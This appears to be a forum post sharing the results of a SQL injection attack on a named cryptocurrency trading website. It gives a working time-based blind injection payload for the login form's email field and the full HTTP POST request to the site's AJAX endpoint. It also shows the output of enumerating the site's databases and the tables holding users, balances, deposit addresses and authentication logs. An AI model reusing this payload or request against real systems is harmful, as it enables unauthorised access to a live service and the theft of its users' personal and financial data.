Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: &action=LOGIN&email=0' AND (SELECT 1800 FROM (SELECT(SLEEP(1)))IkEH) AND 'crzT'='crzT&password=login_password
---

available databases [7]:
[*] information_schema
[*] performance_schema
[*] phpmyadmin
[*] sys
[*] trading

Database: trading
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| t_auth_logs | 59003 |
| t_transactions_history | 23782 |
| t_support | 23522 |
| t_users | 12593 |
| t_trading_orders | 11506 |
| t_users_ref | 6690 |
| t_users_ref_payout | 6690 |
| t_users_balance | 4102 |
| t_invest | 3505 |
| t_autodep_logs | 3196 |
| t_deposit_addreses | 2143 |
| t_verify | 1924 |
| t_transfer_history | 849 |
| t_user_api | 661 |
| t_messages_chat | 483 |
| t_alert_message | 306 |
| t_spammer_promocode | 292 |
| t_users_staking | 253 |
| t_spammer_config | 175 |
| t_spammer_domains | 53 |
| t_dep_currency | 42 |
| t_trading_balance | 38 |
| t_trading_courses | 36 |
| t_spammer_wallet | 22 |
| t_site_currency | 21 |
| t_site_staking | 17 |
| t_site_nft | 4 |
| t_site_o_currency | 3 |
| t_trading_stable_up | 3 |
| t_messages_settings | 2 |
| t_currency_price | 1 |
| t_site_config | 1 |
+------------------------+---------+

POST /ajax/function.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
X-Requested-With: XMLHttpRequest
Referer: https://bitxola.com/
Content-Length: 90
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: bitxola.com
Connection: Keep-alive

&action=LOGIN&email=0&password=login_password
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх